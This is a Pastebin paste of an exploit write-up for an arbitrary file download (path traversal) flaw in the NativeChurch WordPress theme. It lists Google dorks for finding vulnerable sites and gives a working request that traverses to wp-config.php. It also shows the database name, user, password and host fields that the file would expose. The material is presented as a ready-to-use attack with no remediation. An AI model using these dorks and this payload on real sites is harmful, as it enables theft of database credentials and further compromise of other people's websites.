API tools faq
paste
KingSkrupellos

WordPress NativeChurch Multi-Purpose 5.0.x File Download

KingSkrupellos
Feb 25th, 2019
57
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.95 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 26/02/2019
  7. # Vendor Homepage : themeforest.net
  8. # Software Information Link :
  9. themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
  10. # Software Affected Versions : WordPress From 3.9 to 5.0.x
  11. Compatible with Bootstrap 3.x - bbPress 2.5.x
  12. From WooCommerce 2.1.x To WooCommerce 3.4.x,
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
  17. inurl:''inurl:/wp-content/themes/NativeChurch/download/''
  18. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  19. CWE-23 [ Relative Path Traversal ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ####################################################################
  25.  
  26. # Description about Software :
  27. ***************************
  28. NativeChurch is a powerful WordPress Theme designed & developed for Church,
  29.  
  30. Charity, Non-Profit and Religious Websites and comes handy
  31.  
  32. for Portfolio/Corporate Websites as well.
  33.  
  34. ####################################################################
  35.  
  36. # Impact :
  37. ***********
  38. * The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
  39.  
  40. download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
  41.  
  42. An attacker can exploit this issue to download arbitrary files within the context
  43.  
  44. of the web server process. Information obtained may aid in further attacks.
  45.  
  46. Attackers can use a browser to exploit this issue.
  47.  
  48. * The software uses external input to construct a pathname that should be within a
  49.  
  50. restricted directory, but it does not properly neutralize sequences
  51.  
  52. such as ".." that can resolve to a location that is outside of that directory.
  53.  
  54. ####################################################################
  55.  
  56. # Arbitrary File Download Exploit :
  57. ******************************
  58. /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
  59.  
  60. # Example Informations about MySQL WordPress Configuration File :
  61. ***********************************************************
  62. /** Nom de la base de données de WordPress. */
  63. define('DB_NAME',
  64.  
  65. /** Utilisateur de la base de données MySQL. */
  66. define('DB_USER',
  67.  
  68. /** Mot de passe de la base de données MySQL. */
  69. define('DB_PASSWORD',
  70.  
  71. /** Adresse de l'hébergement MySQL. */
  72. define('DB_HOST',
  73.  
  74. ###################################################################
  75.  
  76. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  77.  
  78. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!